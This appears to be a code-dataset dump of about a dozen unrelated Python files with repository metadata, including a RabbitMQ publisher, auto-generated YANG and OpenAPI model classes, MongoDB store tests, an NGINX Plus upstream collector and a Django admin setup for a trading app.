2020-09-11T11:51:35.903284
2019-11-11T13:02:21
2019-11-11T13:02:21
222,054,462
1
0
null
2019-11-16T05:58:13
2019-11-16T05:58:12
null
UTF-8
Python
false
false
535
py
import pika credentials = pika.PlainCredentials('echo', '123') connection = pika.BlockingConnection(pika.ConnectionParameters('172.16.44.142', virtual_host='vhost1', credentials=credentials)) channel = connection.channel() channel.queue_declare(queue='test', durable=True) channel.basic_publish(exchange='', routing_key='test', body='One order here!', properties=pika.BasicProperties(delivery_mode=2), ) print('下单成功') connection.close()
ab0b4cfbf9f72161aa117b1b37987e52089b9254
adea9fc9697f5201f4cb215571025b0493e96b25
/napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/isis/global_/timers/spf/__init__.py
1f2406bbde92beb73269b6ba92ec5145b67db728
[ "Apache-2.0" ]
permissive
andyjsharp/napalm-yang
d8a8b51896ef7c6490f011fe265db46f63f54248
ef80ebbfb50e188f09486380c88b058db673c896
refs/heads/develop
2021-09-09T02:09:36.151629
2018-03-08T22:44:04
2018-03-08T22:44:04
114,273,455
0
0
null
2018-03-08T22:44:05
2017-12-14T16:33:35
Python
UTF-8
Python
false
false
14,778
py
from operator import attrgetter from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType from pyangbind.lib.yangtypes import RestrictedClassType from pyangbind.lib.yangtypes import TypedListType from pyangbind.lib.yangtypes import YANGBool from pyangbind.lib.yangtypes import YANGListType from pyangbind.lib.yangtypes import YANGDynClass from pyangbind.lib.yangtypes import ReferenceType from pyangbind.lib.base import PybindBase from decimal import Decimal from bitarray import bitarray import six # PY3 support of some PY2 keywords (needs improved) if six.PY3: import builtins as __builtin__ long = int unicode = str elif six.PY2: import __builtin__ from . import config from . import state class spf(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: This container defines ISIS SPF timer settings. """ __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_extmethods', '__config','__state',) _yang_name = 'spf' _pybind_generated_by = 'container' def __init__(self, *args, **kwargs): self._path_helper = False self._extmethods = False self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True) self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path()+[self._yang_name] else: return [u'network-instances', u'network-instance', u'protocols', u'protocol', u'isis', u'global', u'timers', u'spf'] def _get_config(self): """ Getter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container) YANG Description: This container defines ISIS SPF timers configuration. """ return self.__config def _set_config(self, v, load=False): """ Setter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container) If this variable is read-only (config: false) in the source YANG file, then _set_config is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_config() directly. YANG Description: This container defines ISIS SPF timers configuration. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """config must be of a type compatible with container""", 'defined-type': "container", 'generated-type': """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""", }) self.__config = t if hasattr(self, '_set'): self._set() def _unset_config(self): self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True) def _get_state(self): """ Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container) YANG Description: This container defines state information for ISIS SPF timers. """ return self.__state def _set_state(self, v, load=False): """ Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container) If this variable is read-only (config: false) in the source YANG file, then _set_state is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_state() directly. YANG Description: This container defines state information for ISIS SPF timers. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """state must be of a type compatible with container""", 'defined-type': "container", 'generated-type': """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""", }) self.__state = t if hasattr(self, '_set'): self._set() def _unset_state(self): self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True) config = __builtin__.property(_get_config, _set_config) state = __builtin__.property(_get_state, _set_state) _pyangbind_elements = {'config': config, 'state': state, } from . import config from . import state class spf(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: This container defines ISIS SPF timer settings. """ __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_extmethods', '__config','__state',) _yang_name = 'spf' _pybind_generated_by = 'container' def __init__(self, *args, **kwargs): self._path_helper = False self._extmethods = False self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True) self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path()+[self._yang_name] else: return [u'network-instances', u'network-instance', u'protocols', u'protocol', u'isis', u'global', u'timers', u'spf'] def _get_config(self): """ Getter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container) YANG Description: This container defines ISIS SPF timers configuration. """ return self.__config def _set_config(self, v, load=False): """ Setter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container) If this variable is read-only (config: false) in the source YANG file, then _set_config is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_config() directly. YANG Description: This container defines ISIS SPF timers configuration. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """config must be of a type compatible with container""", 'defined-type': "container", 'generated-type': """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""", }) self.__config = t if hasattr(self, '_set'): self._set() def _unset_config(self): self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True) def _get_state(self): """ Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container) YANG Description: This container defines state information for ISIS SPF timers. """ return self.__state def _set_state(self, v, load=False): """ Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container) If this variable is read-only (config: false) in the source YANG file, then _set_state is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_state() directly. YANG Description: This container defines state information for ISIS SPF timers. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """state must be of a type compatible with container""", 'defined-type': "container", 'generated-type': """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""", }) self.__state = t if hasattr(self, '_set'): self._set() def _unset_state(self): self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True) config = __builtin__.property(_get_config, _set_config) state = __builtin__.property(_get_state, _set_state) _pyangbind_elements = {'config': config, 'state': state, }
609f208316babac07ccff737f84094897e5d863c
59166105545cdd87626d15bf42e60a9ee1ef2413
/dbpedia/models/unknown.py
dd1afb9f030bccf6a3766988d89ff96438847c90
[]
no_license
mosoriob/dbpedia_api_client
8c594fc115ce75235315e890d55fbf6bd555fa85
8d6f0d04a3a30a82ce0e9277e4c9ce00ecd0c0cc
refs/heads/master
2022-11-20T01:42:33.481024
2020-05-12T23:22:54
2020-05-12T23:22:54
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,224
py
# coding: utf-8 """ DBpedia This is the API of the DBpedia Ontology # noqa: E501 The version of the OpenAPI document: v0.0.1 Generated by: https://openapi-generator.tech """ import pprint import re # noqa: F401 import six from dbpedia.configuration import Configuration class Unknown(object): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. """ """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ openapi_types = { 'description': 'list[str]', 'id': 'str', 'label': 'list[str]', 'type': 'list[str]' } attribute_map = { 'description': 'description', 'id': 'id', 'label': 'label', 'type': 'type' } def __init__(self, description=None, id=None, label=None, type=None, local_vars_configuration=None): # noqa: E501 """Unknown - a model defined in OpenAPI""" # noqa: E501 if local_vars_configuration is None: local_vars_configuration = Configuration() self.local_vars_configuration = local_vars_configuration self._description = None self._id = None self._label = None self._type = None self.discriminator = None self.description = description if id is not None: self.id = id self.label = label self.type = type @property def description(self): """Gets the description of this Unknown. # noqa: E501 small description # noqa: E501 :return: The description of this Unknown. # noqa: E501 :rtype: list[str] """ return self._description @description.setter def description(self, description): """Sets the description of this Unknown. small description # noqa: E501 :param description: The description of this Unknown. # noqa: E501 :type: list[str] """ self._description = description @property def id(self): """Gets the id of this Unknown. # noqa: E501 identifier # noqa: E501 :return: The id of this Unknown. # noqa: E501 :rtype: str """ return self._id @id.setter def id(self, id): """Sets the id of this Unknown. identifier # noqa: E501 :param id: The id of this Unknown. # noqa: E501 :type: str """ self._id = id @property def label(self): """Gets the label of this Unknown. # noqa: E501 short description of the resource # noqa: E501 :return: The label of this Unknown. # noqa: E501 :rtype: list[str] """ return self._label @label.setter def label(self, label): """Sets the label of this Unknown. short description of the resource # noqa: E501 :param label: The label of this Unknown. # noqa: E501 :type: list[str] """ self._label = label @property def type(self): """Gets the type of this Unknown. # noqa: E501 type of the resource # noqa: E501 :return: The type of this Unknown. # noqa: E501 :rtype: list[str] """ return self._type @type.setter def type(self, type): """Sets the type of this Unknown. type of the resource # noqa: E501 :param type: The type of this Unknown. # noqa: E501 :type: list[str] """ self._type = type def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, Unknown): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, Unknown): return True return self.to_dict() != other.to_dict()
9a3dff4505416c7621031482886acde695f4199e
bb00a3876ddb49dcea2cdc4bbd2356359260a563
/poptimizer/evolve/tests/test_store.py
d20ee06f325caec712a7a86b4cc74674f8863523
[ "Unlicense" ]
permissive
hraffiest/poptimizer
1d2975acd0ecbe8466a7a1aa1bf631d12b4c9854
16bc9e056a6daa452d48cdac0dea5901e4a3d4a1
refs/heads/master
2023-04-21T02:29:06.259420
2021-05-05T14:33:03
2021-05-05T14:33:03
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,176
py
from types import SimpleNamespace import bson import pymongo import pytest from poptimizer.evolve import store @pytest.fixture(scope="module", autouse=True) def set_test_collection(): # noinspection PyProtectedMember saved_collection = store._COLLECTION test_collection = saved_collection.database["test"] store._COLLECTION = test_collection yield store._COLLECTION = saved_collection test_collection.drop() def test_get_collection(): collection = store.get_collection() assert isinstance(collection, pymongo.collection.Collection) assert collection.name == "test" @pytest.fixture(scope="class", name="field_instance") def make_field_and_instance(): field = store.BaseField() instance = SimpleNamespace() instance._update = {} return field, instance class TestBaseField: def test_set_name_index(self): field = store.BaseField(index=True) field.__set_name__(SimpleNamespace, "some") assert field._name == store.ID def test_set_name(self, field_instance): field, _ = field_instance field.__set_name__(SimpleNamespace, "some") assert field._name == "some" def test_get_raise(self, field_instance): field, instance = field_instance with pytest.raises(AttributeError) as error: field.__get__(instance, SimpleNamespace) assert "'SimpleNamespace' object has no attribute 'some'" in str(error.value) def test_set(self, field_instance): field, instance = field_instance field.__set__(instance, 42) assert hasattr(instance, "some") assert instance.some == 42 assert len(instance._update) == 1 assert instance._update["some"] == 42 def test_get(self, field_instance): field, instance = field_instance assert field.__get__(instance, SimpleNamespace) == 42 @pytest.fixture(scope="class", name="default_field_instance") def make_default_field_and_instance(): field = store.DefaultField(53) field.__set_name__(SimpleNamespace, "some") instance = SimpleNamespace() instance._update = {} return field, instance class TestDefaultField: def test_unset_get(self, default_field_instance): field, instance = default_field_instance assert field.__get__(instance, SimpleNamespace) == 53 def test_set_get(self, default_field_instance): field, instance = default_field_instance field.__set__(instance, 64) assert field.__get__(instance, SimpleNamespace) == 64 @pytest.fixture(scope="class", name="genotype_field_instance") def make_genotype_field_and_instance(): field = store.GenotypeField() field.__set_name__(SimpleNamespace, "some") instance = SimpleNamespace() instance._update = {} return field, instance class TestGenotypeField: def test_set_not_genotype(self, genotype_field_instance): field, instance = genotype_field_instance field.__set__(instance, None) rez = field.__get__(instance, SimpleNamespace) assert isinstance(rez, store.Genotype) assert isinstance(instance.some, store.Genotype) assert rez is instance.some def test_set_genotype(self, genotype_field_instance): field, instance = genotype_field_instance genotype = store.Genotype(None) field.__set__(instance, genotype) assert genotype is field.__get__(instance, SimpleNamespace) assert genotype is instance.some class TestDoc: def test_new_doc_and_save(self): assert store.get_collection().count_documents({}) == 0 genotype = store.Genotype() doc = store.Doc(genotype=genotype) assert store.get_collection().count_documents({}) == 0 assert len(doc._update) == 2 assert isinstance(doc.id, bson.ObjectId) assert doc.genotype is genotype assert doc.wins == 0 assert doc.model is None with pytest.raises(AttributeError) as error: isinstance(doc.llh, bson.ObjectId) assert "object has no attribute 'llh'" in str(error.value) assert doc.date is None assert doc.timer == 0 assert doc.tickers is None doc.save() assert store.get_collection().count_documents({}) == 1 assert len(doc._update) == 0 def test_load_wrong_doc(self): id_ = bson.ObjectId() with pytest.raises(store.IdError) as error: store.Doc(id_=id_) assert str(id_) in str(error.value) def test_load_doc(self): db_doc = store.get_collection().find_one() doc = store.Doc(id_=db_doc[store.ID]) assert len(doc._update) == 0 assert doc.id == db_doc[store.ID] assert doc.genotype == db_doc["genotype"] assert doc.wins == 0 assert doc.model is None with pytest.raises(AttributeError) as error: isinstance(doc.llh, bson.ObjectId) assert "object has no attribute 'llh'" in str(error.value) assert doc.date is None assert doc.timer == 0 assert doc.tickers is None def test_load_doc_update_and_save(self): db_doc = store.get_collection().find_one() doc = store.Doc(id_=db_doc[store.ID]) assert len(doc._update) == 0 doc.wins = 42 doc.llh = 2.2 doc.timer = 111 assert len(doc._update) == 3 doc.save() assert len(doc._update) == 0 doc_loaded = store.Doc(id_=db_doc[store.ID]) assert len(doc_loaded._update) == 0 assert doc_loaded.id == db_doc[store.ID] assert doc_loaded.genotype == db_doc["genotype"] assert doc_loaded.wins == 42 assert doc_loaded.model is None assert doc_loaded.llh == 2.2 assert doc_loaded.date is None assert doc_loaded.timer == 111 assert doc_loaded.tickers is None def test_delete(self): assert store.get_collection().count_documents({}) == 1 db_doc = store.get_collection().find_one() doc = store.Doc(id_=db_doc[store.ID]) doc.delete() assert store.get_collection().count_documents({}) == 0
ee7a30ed534036c38ac71e4aa8e959f2c127a862
251651b763c2588a0a6b65d8b23d93b195a91788
/virtual/bin/gunicorn
0b628ba141f066067c63f04acb73acfb5b4b36dc
[ "MIT" ]
permissive
AugustineOchieng/studio
b0f6feb14f7f3e1f65644bffbee9d2c3fe805c8f
ee7fb55fd2ad7046414a68872af98361719af42b
refs/heads/master
2020-05-21T08:21:07.033975
2019-05-15T10:14:45
2019-05-15T10:14:45
185,977,336
1
0
null
null
null
null
UTF-8
Python
false
false
251
#!/home/moringa/Desktop/studio/virtual/bin/python # -*- coding: utf-8 -*- import re import sys from gunicorn.app.wsgiapp import run if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(run())
3f86754056689d08a519f2a79797332c97fa1366
fcb94b0575d55b246a4e78dfec2610c9aceb836e
/tests/test_code/py/import_paths/abra.py
046a90a0eb69f363cdbdc9eb6c947ebc79278f71
[ "LGPL-2.0-or-later", "MIT" ]
permissive
sarvex/code2flow
1504fb0537ea17f486013e67958b4e17551f3a02
77375b90a09abd4b4d38167737d02ff4737a52aa
refs/heads/main
2023-06-10T03:24:18.935595
2023-05-30T23:52:11
2023-05-30T23:52:11
33,498,323
0
0
MIT
2023-05-30T23:52:12
2015-04-06T18:33:55
Python
UTF-8
Python
false
false
19
py
def abra2(): pass
6c917765f0811b156ddda90eac4c87e9f06185f7
f98c9dea0e212be5c7bc3161499e5633383bd4d7
/python/fruit_package_module_test.py
c82839cdcdd29c508d4f8791380d7717c7237b7c
[ "MIT" ]
permissive
ysoftman/test_code
dddb5bee3420977bfa335320a09d66e5984403f5
0bf6307073081eeb1d654a1eb5efde44a0bdfe1e
refs/heads/master
2023-08-17T05:45:49.716829
2023-08-16T05:00:09
2023-08-16T05:00:09
108,200,568
4
0
MIT
2023-03-15T04:23:10
2017-10-25T00:49:26
C++
UTF-8
Python
false
false
509
py
# 패키지(모듈이 모인 디렉토리)가 이닌 모듈이 같은 경로에 있는 경우 # import fruite_module as fm # alias 로 패키지.모듈 사용하기 import fruite_package.fruit_module as fm fm.fruit.apple(100) fm.fruit.lemon("2000") # 패키지.모듈 전체 사용하기 from fruite_package.fruit_module import * fruit.apple(100) # 패키지.모듈 중 fruit 클래스를 fr 이름으로 사용 from fruite_package.fruit_module import fruit as fr fr.lemon(200) fr.apple(50) fr.orange(100)
22cff3945dd868a9c060382d1020722c7a4d2eea
4a08ae605a8f96146b14881330d21317a67e225d
/data_types/question17.py
a245b912a288e46b12cce2f9783bf7dbe0c76b56
[]
no_license
alex1the1great/Assignment
dd6083a2196d9bae36bb66bf12a2bdc07a0b93e8
5a806668c3bfc0d9750421c4ae287f19cbf36fc7
refs/heads/master
2022-11-13T11:07:13.875607
2020-06-29T03:51:17
2020-06-29T03:51:17
275,724,898
0
0
null
null
null
null
UTF-8
Python
false
false
361
py
import re print('Example: 1 2 3 4 5') numbers = input('Enter list of numbers separate with space:') pattern = r'^[0-9\s]+$' check_multi = re.findall(pattern, numbers) if not check_multi: print('Please enter valid format') else: total = numbers.split(' ') product = 1 for i in total: i = int(i) product *= i print(product)
06c23408811bd37ee1ea076d37ef63244b96f858
15f321878face2af9317363c5f6de1e5ddd9b749
/solutions_python/Problem_155/945.py
a43e4458d2b1f38b912356b2ce0d2242713cfb2c
[]
no_license
dr-dos-ok/Code_Jam_Webscraper
c06fd59870842664cd79c41eb460a09553e1c80a
26a35bf114a3aa30fc4c677ef069d95f41665cc0
refs/heads/master
2020-04-06T08:17:40.938460
2018-10-14T10:12:47
2018-10-14T10:12:47
null
0
0
null
null
null
null
UTF-8
Python
false
false
647
py
def nombre_ami(b): debout = 0 ami = 0 compteur = 0 ami_en_plus = 0 for chiffre in b: if compteur > debout: ami_en_plus = (compteur - debout) ami += ami_en_plus debout += ami_en_plus debout += int(chiffre) compteur += 1 return str(ami) def solution_jam1(): source = open("D:/Download/test.txt","r") output = open("D:/Download/jam1long.txt","w") liste = source.readline() liste = liste.split('\n') for i in range(int(liste[0])): liste = source.readline() liste = liste.split() output.write('Case #'+str(i+1)+': '+nombre_ami(liste[1])+'\n') output.close() source.close() solution_jam1()
e00d864ccd59cb04d2832d0d8da60884622e3044
b2de5660d81afdf6b1fba058faee6ece6a51e462
/amplify/agent/collectors/plus/upstream.py
ebd305b92eb648c9fd3ca9fc2b1bc0b84eb905e5
[ "BSD-2-Clause" ]
permissive
Ferrisbane/nginx-amplify-agent
725d8a7da7fb66e0b41cddd8139d25a084570592
ef769934341374d4b6ede5fcf5ebff34f6cba8de
refs/heads/master
2021-01-22T00:03:49.686169
2016-07-20T17:50:30
2016-07-20T17:50:30
63,801,713
0
0
null
2016-07-20T17:41:25
2016-07-20T17:41:25
null
UTF-8
Python
false
false
3,982
py
# -*- coding: utf-8 -*- from amplify.agent.collectors.plus.util import upstream from amplify.agent.common.context import context from amplify.agent.collectors.plus.abstract import PlusStatusCollector __author__ = "Grant Hulegaard" __copyright__ = "Copyright (C) Nginx, Inc. All rights reserved." __credits__ = ["Mike Belov", "Andrei Belov", "Ivan Poluyanov", "Oleg Mamontov", "Andrew Alexeev", "Grant Hulegaard", "Arie van Luttikhuizen"] __license__ = "" __maintainer__ = "Grant Hulegaard" __email__ = "[email protected]" class UpstreamCollector(PlusStatusCollector): short_name = 'plus_upstream' def collect(self): try: tuples = self.gather_data() for data, stamp in tuples: # workaround for supporting old N+ format # http://nginx.org/en/docs/http/ngx_http_status_module.html#compatibility peers = data['peers'] if 'peers' in data else data for peer in peers: # This loop will aggregate all peer metrics as a single "upstream" entity. for method in ( self.active_connections, self.upstream_request, self.upstream_header_time, self.upstream_response_time, self.upstream_responses, self.upstream_bytes, self.upstream_fails, self.upstream_health_checks, self.upstream_queue, self.upstream_peer_count ): try: method(peer, stamp) except Exception as e: exception_name = e.__class__.__name__ context.log.error( 'failed to collect n+ upstream peer metrics %s due to %s' % (method.__name__, exception_name) ) context.log.debug('additional info:', exc_info=True) try: self.increment_counters() self.finalize_latest() except Exception as e: exception_name = e.__class__.__name__ context.log.error( 'failed to increment n+ upstream counters due to %s' % exception_name ) context.log.debug('additional info:', exc_info=True) except Exception as e: exception_name = e.__class__.__name__ context.log.error( 'failed to collect n+ upstream metrics due to %s' % exception_name ) context.log.debug('additional info:', exc_info=True) def active_connections(self, data, stamp): upstream.collect_active_connections(self, data, stamp) def upstream_request(self, data, stamp): upstream.collect_upstream_request(self, data, stamp) def upstream_header_time(self, data, stamp): upstream.collect_upstream_header_time(self, data, stamp) def upstream_response_time(self, data, stamp): upstream.collect_upstream_response_time(self, data, stamp) def upstream_responses(self, data, stamp): upstream.collect_upstream_responses(self, data, stamp) def upstream_bytes(self, data, stamp): upstream.collect_upstream_bytes(self, data, stamp) def upstream_fails(self, data, stamp): upstream.collect_upstream_fails(self, data, stamp) def upstream_health_checks(self, data, stamp): upstream.collect_upstream_health_checks(self, data, stamp) def upstream_queue(self, data, stamp): upstream.collect_upstream_queue(self, data, stamp) def upstream_peer_count(self, data, stamp): upstream.collect_upstream_peer_count(self, data, stamp)
b4cff199f29e741f20b31e5e5f92df6fd15d82ab
d200a54adcec3a254a909b9689f925c1614f6fb1
/backend/core/admin.py
a526227756b4d1de8a88c8269f99a134351a5779
[]
no_license
shusaku-ishikawa/binance
1bbe7f4aaf32c0ade4f67da7a4c1972f414bfa19
60bad0848fa4f4666e2476117a79ee8452326ed1
refs/heads/master
2022-01-27T01:35:24.038917
2019-11-30T12:42:36
2019-11-30T12:42:36
204,909,653
0
1
null
2022-01-15T05:20:54
2019-08-28T10:50:13
JavaScript
UTF-8
Python
false
false
2,304
py
from django.contrib import admin from django.contrib.auth.admin import UserAdmin from django.contrib.auth.forms import UserChangeForm, UserCreationForm from django.utils.translation import ugettext_lazy as _ from .models import * from django.shortcuts import render from django.http import HttpResponseRedirect from django.core.mail import send_mail from django.conf import settings from django.utils.safestring import mark_safe class MyUserChangeForm(UserChangeForm): class Meta: model = User fields = '__all__' class MyUserCreationForm(UserCreationForm): class Meta: model = User fields = ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb' ) class MyUserAdmin(UserAdmin): fieldsets = ( (None, {'fields': ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password')}), (_('Personal info'), {'fields': ()}), (_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}), (_('Important dates'), {'fields': ('last_login',)}), ) add_fieldsets = ( (None, { 'classes': ('wide',), 'fields': ('email','api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password1', 'password2'), }), ) form = MyUserChangeForm add_form = MyUserCreationForm list_display = ('email', 'api_key','api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'is_staff',) search_fields = ('email',) ordering = ('email',) class SymbolAdmin(admin.ModelAdmin): #list_display = [field.name for field in Symbol._meta.get_fields()] list_display = ['symbol', 'from_currency', 'to_currency', 'side'] class OrderSequenceAdmin(admin.ModelAdmin): list_display = ['t1', 't2', 't3'] class OrderAdmin(admin.ModelAdmin): list_display = ['symbol', 'order_id', 'quantity', 'quote_quantity', 'price', 'time', 'status'] class OrderSequenceResultAdmin(admin.ModelAdmin): list_display = ['master', 't1_result', 't2_result', 't3_result', 'profit'] admin.site.register(User, MyUserAdmin) admin.site.register(Symbol, SymbolAdmin) admin.site.register(OrderSequence, OrderSequenceAdmin) admin.site.register(Order, OrderAdmin) admin.site.register(OrderSequenceResult, OrderSequenceResultAdmin)
4d5c0786be25e6910e4ce018e76c712744d39dae
de24f83a5e3768a2638ebcf13cbe717e75740168
/moodledata/vpl_data/74/usersdata/197/40006/submittedfiles/lecker.py
2e27da6fdd494d21fc5e283193a357ccb803379a
[]
no_license
rafaelperazzo/programacao-web
95643423a35c44613b0f64bed05bd34780fe2436
170dd5440afb9ee68a973f3de13a99aa4c735d79
refs/heads/master
2021-01-12T14:06:25.773146
2017-12-22T16:05:45
2017-12-22T16:05:45
69,566,344
0
0
null
null
null
null
UTF-8
Python
false
false
449
py
# -*- coding: utf-8 -*- import math a=int(input('Digite o valor do número a:')) b=int(input('Digite o valor do número b:')) c=int(input('Digite o valor do número c:')) d=int(input('Digite o valor do número d:')) if a>b and b<c and c>d: print('N') elif a==b==c==d: print('N') elif a<b and b>c and c<d: print('N') elif a>b and b<c and c<d: print('N') elif a==b==c>=d and a<b==c==d and a==b<c==d: print('N') else: print('S')
a85eca58f0c19dea7674254798bcf77bb60ed9b8
a882ccf759025735f926695d6a5a39937854646a
/e_step4/pygame00.py
a91f3f96979ff338f83cd1d55dc042ebde65d456
[]
no_license
muzudho/practice-open-cv2
5c1534564bcf43c2d8f7a6fb4ee1583bd77337f9
